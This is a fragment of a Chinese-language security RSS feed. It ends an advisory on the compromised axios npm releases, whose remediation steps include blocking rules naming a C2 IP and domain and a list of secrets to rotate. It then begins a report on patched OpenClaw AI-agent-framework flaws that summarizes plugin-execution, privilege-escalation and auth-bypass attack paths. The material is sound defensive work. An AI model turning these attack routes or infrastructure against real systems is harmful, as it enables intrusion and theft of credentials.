rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">GitHub / GitLab / CI/CD secrets</span></p></li><li style="display: list-item;margin: 0.5em 8px;color: rgb(51, 51, 51);letter-spacing: 0.05em;"><p style="letter-spacing: 0.05em;color: rgb(51, 51, 51);margin: 8px 0px;padding: 0px;line-height: 1.75em;"><span leaf="">.env 文件中的所有敏感值（数据库密码、API 密钥等）</span></p></li></ul><h3 data-line="118" style="padding-left: 12px;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);margin: 8px 8px 8px 0px;color: rgb(51, 51, 51);font-size: calc(19.2px);font-weight: bold;line-height: 1.75em;"><span leaf="">CI/CD 流水线加固</span></h3><p data-line="120" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><strong style="color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;"><span leaf="">审计历史流水线</span></strong><span leaf="">： 检查所有 CI/CD job 日志，找出曾执行 npm install axios@1.14.1 或 axios@0.30.4 的任务，对相关流水线注入的所有 secrets 进行轮换。 强制禁用 postinstall 钩子：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span style="font-size: 11px;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">bash</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="bash" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 8px 0px;padding: 0px;line-height: 1.75em;min-height: 1em;white-space: nowrap;"><span leaf="">npm ci --ignore-scripts</span></p></code></pre></div><p data-line="125" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">在网络/DNS 层封锁 C2（Linux iptables）：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span style="font-size: 11px;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">bash</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="bash" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 8px 0px;padding: 0px;line-height: 1.75em;min-height: 1em;white-space: nowrap;"><span leaf="">iptables -A OUTPUT -d 142.11.206.73 -j DROP</span></p></code></pre></div><p data-line="130" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">在 hosts 文件中封锁 C2 域名（macOS / Linux）：</span></p><div style="margin: 10px 8px;border-radius: 8px;border: 1px solid rgb(200, 208, 219);background: rgb(234, 238, 243);overflow: hidden;"><p style="text-align: right;padding: 4px 10px 2px;background: rgb(212, 218, 226);border-bottom: 1px solid rgb(200, 208, 219);margin-top: 8px;margin-bottom: 8px;line-height: 1.75em;"><span style="font-size: 11px;color: rgb(58, 80, 112);font-family: &#34;Fira Code&#34;, Menlo, &#34;Operator Mono&#34;, Consolas, Monaco, monospace;letter-spacing: 0px;"><span leaf="">bash</span></span></p><pre style="margin: 0px;border: none;border-radius: 0px;box-shadow: none;background: transparent;font-size: 14.4px;line-height: 1.5;overflow-x: auto;padding: 0px !important;"><code language="bash" style="display: block;padding: 0.5em 1em 1em;overflow-x: auto;text-indent: 0px;color: rgb(0, 25, 58);white-space: nowrap;word-break: normal;overflow-wrap: normal;margin: 0px;font-size: inherit;line-height: inherit;border: none;border-radius: 0px;background: transparent !important;"><p style="margin: 8px 0px;padding: 0px;line-height: 1.75em;min-height: 1em;white-space: nowrap;"><span style="color: rgb(0, 72, 171);"><span leaf="">echo</span></span><span style="color: rgb(0, 72, 171);"><span leaf="">&#34;0.0.0.0 sfrclak.com&#34;</span></span><span leaf=""> &gt;&gt; /etc/hosts</span></p></code></pre></div><p data-line="136" style="margin: 8px;letter-spacing: 0.05em;color: rgb(51, 51, 51);line-height: 1.75em;"><span leaf="">点击“<span textstyle="" style="color: rgb(0, 82, 255);font-weight: bold;">阅读原文</span>”访问腾讯iOA官网了解对应产品能力，更多iOA详情或技术支持，扫码申请免费试用，我们会尽快联系您。<img data-aistatus="1" class="rich_pages wxw-img" data-ratio="1.0047846889952152" data-type="png" data-w="418" style="display:block;max-width:100%;margin-right:auto;margin-left:auto;border-radius:4px;box-shadow:rgba(0, 0, 0, 0.12) 0px 2px 12px;width:259px;height:260px;" data-imgfileid="100027876" src="https://wechat2rss.xlab.app/img-proxy/?k=2f9fb3b3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FjHUbrwW0VwVTv8r5MIxicuQlDhHyt6Wa3otwPGnz45aahuQbnpQ8c56ibeVRyqDxdmWbibr5UNL0uodhgwtFOeBXBVxzUkTdDibvXrdian3aicLpM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p></div><p style="display: none;"><mp-style-type data-value="10000"></mp-style-type></p>


<p><a href="https://ioa.cloud.tencent.com/">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=b6fefa18&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzI5ODk3OTM1Ng%3D%3D%26mid%3D2247511532%26idx%3D1%26sn%3Da64a348704fcf6aa7289964294b7c0c9">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 01 Apr 2026 12:37:00 +0800</pubDate>
    </item>
    <item>
      <title>OpenClaw 近期安全漏洞修复汇总报告</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzI5ODk3OTM1Ng==&amp;mid=2247511501&amp;idx=1&amp;sn=dee1f9ede8c0605190a859354bb8cbdd</link>
      <description>近日，腾讯安全科恩实验室针对热门开源 AI 智能体框架 OpenClaw 的安全性进行了专项分析。</description>
      <content:encoded><![CDATA[<p><span>腾讯安全威胁情报中心</span> <span>2026-03-26 20:25</span> <span style="display: inline-block;">上海</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=31ae8355&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FjHUbrwW0VwWKTJSX6TiaIUqmvYAVt9919R6gfvUFWojia1ra0icjb0iaK4MicLOFs4yMH3T1lUpmhBeFEyLmTicZjqcVgfccGicO2WCibQXBSRapQibU%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgba(0, 0, 0, 0.9);font-family: &#34;PingFang SC&#34;, system-ui, -apple-system, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-align: justify;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;visibility: visible;" data-pm-slice="0 0 []"><span data-pm-slice="0 0 []" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(51, 51, 51);font-family: &#34;PingFang SC&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.8px;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">近日，腾讯安全科恩实验室针对热门开源 AI 智能体框架 OpenClaw 的安全性进行了专项分析。根据对该项目 GitHub 仓库近期提交（Commit）记录及版本迭代信息的深度回溯，我们发现其在 2026.3.22 之前的版本中存在多项涉及插件执行、权限提升及鉴权绕过的系统性安全缺陷。</span></span><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;"><br/></span><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(51, 51, 51);font-family: &#34;PingFang SC&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.8px;orphans: 2;text-align: start;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">需要特别说明的是，目前所有已发现的风险点均已在官方最新版本 2026.3.24 中得到完整修复。本次披露的信息并非 0day 漏洞，而是基于社区已公开代码变更的追溯性审计结果。由于 OpenClaw 在国内开发者及 AI 自动化领域的普及度极高，为防止旧版本用户遭受供应链攻击或远程提权风险，我们整理了本篇报告，旨在为用户提供清晰的漏洞原理说明及切实可行的加固指引。</span></span></p><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgba(0, 0, 0, 0.9);font-family: &#34;PingFang SC&#34;, system-ui, -apple-system, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;text-align: left;visibility: visible;"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(51, 51, 51);font-family: &#34;PingFang SC&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.8px;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;"><span textstyle="" style="font-weight: bold;">分析对象</span></span><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;"><span textstyle="" style="font-weight: bold;">：</span>OpenClaw </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">2026.3.22 beta.1</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;"> / </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">2026.3.22</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;"> / </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">2026.3.23</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;"> / </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">2026.3.24</span></code></span></p><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgba(0, 0, 0, 0.9);font-family: &#34;PingFang SC&#34;, system-ui, -apple-system, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;text-align: left;visibility: visible;"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(51, 51, 51);font-family: &#34;PingFang SC&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.8px;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;visibility: visible;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">整体风险等级</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">：</span><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">严重</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">，含多项可被远程利用的鉴权绕过与代码执行路径  </span></span></p><div style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgba(0, 0, 0, 0.9);font-family: &#34;PingFang SC&#34;, system-ui, -apple-system, &#34;system-ui&#34;, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 17px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.544px;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;white-space: normal;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;text-align: left;visibility: visible;"><span style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(51, 51, 51);font-family: &#34;PingFang SC&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;font-style: normal;font-variant-ligatures: normal;font-variant-caps: normal;font-weight: 400;letter-spacing: 0.8px;orphans: 2;text-indent: 0px;text-transform: none;widows: 2;word-spacing: 0px;-webkit-text-stroke-width: 0px;background-color: rgb(255, 255, 255);text-decoration-thickness: initial;text-decoration-style: initial;text-decoration-color: initial;float: none;display: inline !important;visibility: visible;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">推荐行动</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">：立即升级至 </span><code style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 3px 5px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;font-size: 14.4px;color: rgb(15, 76, 166);background: rgb(236, 244, 255);border-radius: 4px;border: 1px solid rgb(212, 229, 255);visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">2026.3.24</span></code><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;"> 或更高版本</span></span><hr style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));visibility: visible;"/><h2 data-line="8" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2.5em auto 1.5em;padding: 0.3em 1.2em;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: block;width: fit-content;color: rgb(255, 255, 255);background: rgb(0, 82, 217);border-radius: 6px;box-shadow: none;visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">01 漏洞概览</span></h2><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;text-align: center;visibility: visible;"><img alt="图片" class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="508711167" data-ratio="0.2796296296296296" data-s="300,640" data-type="png" data-w="1080" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;vertical-align: bottom;box-sizing: border-box !important;overflow-wrap: break-word !important;width: 578px !important;visibility: visible !important;height: auto !important;" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=56687674&amp;u=https%3A%2F%2Fmmecoa.qpic.cn%2Fmmecoa_png%2F4EHqib0vXQFicbKOlA1YVIUw2P030RjUFD3ibxBQLLsX50nsdU7HEvX5TbqtSnfly0k3GAtyQAWw3bStBQeeeGT8yBjS3ib0U4YM59F21CLic60M%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg%26tp%3Dwebp%26wxfrom%3D10005%26wx_lazy%3D1%23imgIndex%3D0"/></p><p data-line="20" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 1.5em 8px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;clear: both;min-height: 1em;letter-spacing: 0.05em;color: rgb(51, 51, 51);visibility: visible;"><strong style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;color: rgb(17, 17, 17);font-weight: bold;font-size: inherit;letter-spacing: 0px;visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">总结</span></strong><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">：攻击者可通过克隆含恶意插件的仓库、伪造 WebSocket 权限声明、重放设备配对码或匿名访问 Canvas 路由等方式，在未修复版本上实现权限提升乃至代码执行。</span></p><hr style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));visibility: visible;"/><h2 data-line="24" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2.5em auto 1.5em;padding: 0.3em 1.2em;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: block;width: fit-content;color: rgb(255, 255, 255);background: rgb(0, 82, 217);border-radius: 6px;box-shadow: none;visibility: visible;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible;">02 风险主线速览</span></h2><p style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;text-align: center;visibility: visible;"><img alt="图片" class="rich_pages wxw-img js_insertlocalimg" data-aistatus="1" data-imgfileid="508711168" data-ratio="0.35185185185185186" data-s="300,640" data-type="png" data-w="1080" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;vertical-align: bottom;box-sizing: border-box !important;overflow-wrap: break-word !important;visibility: visible !important;width: 676.984px !important;height: auto !important;" type="block" src="https://wechat2rss.xlab.app/img-proxy/?k=a19064b7&amp;u=https%3A%2F%2Fmmecoa.qpic.cn%2Fsz_mmecoa_png%2F4EHqib0vXQFibRzILaI9byC4GV4CsKjkAUlMNIibR2p3WxedpCicUACHsa0lkSBap9oXZo7IBGvOg5Maq8GwTYBejFTbj3JvW2QNPQvsiaKmqkE4%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg%26tp%3Dwebp%26wxfrom%3D10005%26wx_lazy%3D1%23imgIndex%3D1"/></p><hr style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-style: solid;border-width: 2px 0px 0px;border-color: rgba(0, 0, 0, 0.1);transform-origin: 0px 0px;transform: scale(1, 0.5);height: 1px;background: linear-gradient(to right, rgba(0, 0, 0, 0), rgba(0, 0, 0, 0.1), rgba(0, 0, 0, 0));"/><h2 data-line="40" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2.5em auto 1.5em;padding: 0.3em 1.2em;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;display: block;width: fit-content;color: rgb(255, 255, 255);background: rgb(0, 82, 217);border-radius: 6px;box-shadow: none;"><span leaf="" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 0px;padding: 0px;outline: 0px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;">03 普通用户安全防护建议</span></h2><h3 data-line="42" style="-webkit-tap-highlight-color: rgba(0, 0, 0, 0);margin: 2em 8px 0.75em 0px;padding: 0px 0px 0px 12px;outline: 0px;font-weight: bold;font-size: calc(19.2px);max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;border-left: 4px solid rgb(0, 82, 217);border-bottom: 1px dashed rgb(0, 82, 217);color: rgb(51, 51, 